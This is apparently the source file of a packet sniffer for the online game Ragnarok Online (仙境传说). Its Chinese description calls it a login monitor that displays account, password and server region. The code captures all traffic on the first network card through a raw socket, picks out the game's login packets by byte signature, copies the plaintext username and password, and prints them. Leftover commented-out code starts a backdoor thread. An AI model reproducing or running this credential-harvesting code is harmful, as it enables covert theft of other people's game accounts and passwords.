stdafx.cpp

网游《仙境传说》的登录监控程序。 可以显示帐户、密码、大区等。 使用了rawsocket检测技术

// stdafx.cpp : source file that includes just the standard includes
//	GameSpy.pch will be the pre-compiled header
//	stdafx.obj will contain the pre-compiled type information

#include "stdafx.h"

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif


BOOL InitSocket() 
{ 
	WSADATA data; 
	WORD ver; 

	ver = MAKEWORD(2,2); 

	if(WSAStartup(ver, &data) != 0) 
	{ 
		return FALSE; 
	} 

	return TRUE; 
}

BOOL DoSniffing() 
{ 
	int Length=0; // Variable To Hold The Receive Buffer Length 
	char RecvBuf[MAX_PACK_LEN] = {0}; // Receive Buffer 
	SOCKET SocketRaw = INVALID_SOCKET; // Raw Socket 

	SocketRaw = socket(AF_INET , SOCK_RAW , IPPROTO_IP); // Create A Raw Socket 
	if (SocketRaw == INVALID_SOCKET) // Fail To Create A Raw Socket 
	{ 
		printf("Fail To Create A Raw Socket\n"); // Display Error Message 
		return FALSE; // Return False 
	} 

	char FAR name[MAX_HOSTNAME_LAN]; 

	if (gethostname(name, MAX_HOSTNAME_LAN) == 
	SOCKET_ERROR) // Fail To Get The Host Name 
	{ 
		printf("Fail To Get Host Name\n"); // Display Error Message 
		closesocket(SocketRaw); // Close The Raw Socket Created 
		return FALSE; // Return False 
	} 

	// The Below Is The NIC Stuff 
	struct hostent FAR * pHostent; 
	pHostent = (struct hostent * )_alloca(sizeof(struct hostent)); // Allocate Hostent Buffer 
	pHostent = gethostbyname(name); 
	SOCKADDR_IN sa; 
	sa.sin_family = AF_INET; // That's Internet Related 
	sa.sin_port = htons(0); // Any Port Avariable On The OS 
	if(pHostent->h_addr_list[0] != 0) // We Only Check The First NIC 
	{ 
		memcpy(&sa.sin_addr.S_un.S_addr, pHostent->h_addr_list[0], pHostent->h_length); // We Use The First NIC As The Sniffing Subject 
	} 
	else // Well,The First NIC Is Not Valid 
	{ 
		printf("Get Host By Name Fails\n"); // Display Error Message 
		free(pHostent); // Free The Hostent Buffer 
		closesocket(SocketRaw); 
		return FALSE; // Return FALSE; 
	}

	//free(pHostent); // Free The Hostent Buffer 

	if (bind(SocketRaw, (PSOCKADDR)&sa, sizeof(sa)) == SOCKET_ERROR) // Bind The Raw Socket On The First NIC,But Fails 
	{ 
		printf("Fail To Bind\n"); // Display Error Message 
		closesocket(SocketRaw); // Close The Raw Socket 
		return FALSE; // Return False 
	} 

	// Forget About The Below A Few Lines,They Are Just A Static Routine To Do The None_Driver Sniffing(Some Sort Of Must-Have Codes) 
	
	DWORD dwBufferLen;
	DWORD dwBufferInLen = 1; 
	DWORD dwBytesReturned = 0 ; 

	
	if(WSAIoctl(SocketRaw, SIO_RCVALL, &dwBufferInLen, sizeof(dwBufferInLen), &dwBufferLen, sizeof(dwBufferLen), &dwBytesReturned , NULL , NULL) == SOCKET_ERROR)
	{
		closesocket(SocketRaw); 
		return FALSE; 
	} 
	

	while(TRUE) // Sniffing Starts Here With Forever Loop 
	{ 
		memset(RecvBuf, 0, sizeof(RecvBuf)); // Reset The Receive Buffer 
		Length = recv(SocketRaw, RecvBuf, sizeof(RecvBuf), 0); // Try To Receive Data 
		if(Length == SOCKET_ERROR) // Get Error As Receiving Data 
		{ 
			printf("Fail To Receive Data\n"); // Display Error Message 
			break; // Leave The Loop 
		} 
		if(DecodeIPPack(RecvBuf,Length)) // Decode The Buffer Received,And The Active Code Is Found 
		{ 
			//printf("Bingo,The BackDoor Is Activated On Port %d\n", BackDoorPort); //We Are Going To Activate The BackDoor 
			/*
			DWORD dwThreadID; 
			HANDLE BackDoorThread = CreateThread(NULL,0,&StartBackDoor,NULL,0,&dwThreadID); // Create The Back Door Thread 
			
			WaitForSingleObject(BackDoorThread,INFINITE); // Wait Until The Back Door Ends 
			*/
		} 
	} 

	closesocket(SocketRaw); // Close The Raw Socket 
	return TRUE; // Return 
}// End Of DoSniffing Function 


//------------------------------------------------------------ 
// Purpose: To Decode The IP Packer 
// Return Type: Boolean 
// Parameters: 1.const char *Buffer -->The Received Buffer 
// 2.Const int BufferSize -->The Received Buffer Size 
//------------------------------------------------------------ 
BOOL DecodeIPPack(const char *Buffer,const int BufferSize) 
{ 
	IP_HEADER *pIpheader; // IP Header 
	SOCKADDR_IN saSource, saDest; 
	pIpheader = (IP_HEADER *)Buffer; // Transfer The Buffer	Into IP Header Form 
	int Protocol = pIpheader->proto; // Get The Protocol 
	if ((Protocol != IPPROTO_TCP)) // Not TCP Protocol 
	{ 
		return FALSE; // Return False Since We Only Interest In TCP Protocol 
	} 

	

	saSource.sin_addr.s_addr = pIpheader->sourceIP; 
	saDest.sin_addr.s_addr = pIpheader->destIP; 

	strncpy(SourceIPAddress, inet_ntoa(saSource.sin_addr), MAX_ADDR_LEN); // Get The Source IP(Important For Doing Reverse Connection) 
	strncpy(DestIPAddress, inet_ntoa(saDest.sin_addr), MAX_ADDR_LEN); // Get The Source IP(Important For Doing Reverse Connection) 




	int IPLength = sizeof(unsigned long) * (pIpheader->h_lenver & 0xf); // Get The IP Length 
	return DecodeTCPPack(Buffer+IPLength, BufferSize); // Decode TCP Packer 

}// End Of DecodeIPPack Function 

//------------------------------------------------------------ 
// Purpose: To Decode The TCP Packer 
// Return Type: Boolean 
// Parameters: 1.const char *TCPBuffer -->The TCP Buffer 
// 2.Const int BufferSize -->The TCP Buffer Size 
//------------------------------------------------------------ 
BOOL DecodeTCPPack(const char * TCPBuffer,const int BufferSize) 
{ 
	TCP_HEADER * pTcpHeader; // TCP Header 
	int iSourcePort,iDestPort; // Source Port And DestPort 

	pTcpHeader = (TCP_HEADER * )TCPBuffer; // Transfer The Buffer Into TCP Header Form 
	int TcpHeaderLen = pTcpHeader->th_lenres>>4; // Get The TCP Leader Length 
	TcpHeaderLen *= sizeof(unsigned long); 
	const char * TcpData = TCPBuffer + TcpHeaderLen; // Get The TCP Data 

	iSourcePort = ntohs(pTcpHeader->th_sport); // Get The Source Port 
	iDestPort = ntohs(pTcpHeader->th_dport); // Get The Destination Port 

	const char * PureData = TCPBuffer + 20;
	const int PureSize = BufferSize - 20;


	//printf("%s:%d-->%s:%d\r\n",SourceIPAddress, iSourcePort, DestIPAddress, iDestPort); // Display A Message 
	if(iSourcePort == GAME_SERVER_PORT || iDestPort == GAME_SERVER_PORT)
	{

		if(PureSize == 75)
		{
			if(PureData[0] == (char)0x64 &&
				PureData[1] == (char)0x00 &&
				PureData[2] == (char)0x6d &&
				PureData[3] == (char)0x04)
			{
				//登录数据包
				strcpy(GameUid, PureData + 6);
				strcpy(GamePwd, PureData + 30);


				//printf("%s:%s\n", GameUid, GamePwd);
				
			}

		}
		

		if(PureSize == 67)
		{
			if(PureData[0] == (char)0x69 &&
				PureData[1] == (char)0x00 &&
				PureData[2] == (char)0x4f &&
				PureData[3] == (char)0x00)
			{

				//登录成功返回
				GameLogined = true;
			}
		}

		if(PureSize == 52)
		{
			
			if(PureData[0] == (char)0xd2 &&
				PureData[1] == (char)0x33 &&
				PureData[2] == (char)0x1f &&
				PureData[3] == (char)0x11)
			
			{
				//所在分区返回
				strcpy(GameWorld, PureData + 6);

				printf("%s : %s @ %s logged in.\n", GameUid, GamePwd, GameWorld);


				/*
				char _cur_dir[MAX_PATH];
				GetCurrentDirectory(MAX_PATH, _cur_dir);
				sprintf(_cur_dir, "%s\\ac.exe %s %s", _cur_dir, GameWorld, GameUid);
				WinExec(_cur_dir, SW_SHOW);
				*/


				IIACSLogined = true;
				acOnLogin(GameWorld, GameUid);
				
			}

		}
		

		
		
		return TRUE; // Return TRUE(The Back Door Will Be Activated Soon) 
	} 

	return FALSE; // We Didn't Receive An Active Code,Return False 
}// End Of DecodeTCPPack Function 

void CheckGameQuit(void * p)
{
	while(1)
	{
		if(IIACSLogined)
		{
			if(!FindWindow("仙境传说", "仙境传说"))
			{
				IIACSLogined = false;
				acOnLogout();
				printf("logout");
			}
		}
		Sleep(1000);
	}
}


#pragma comment(lib, "accl.lib")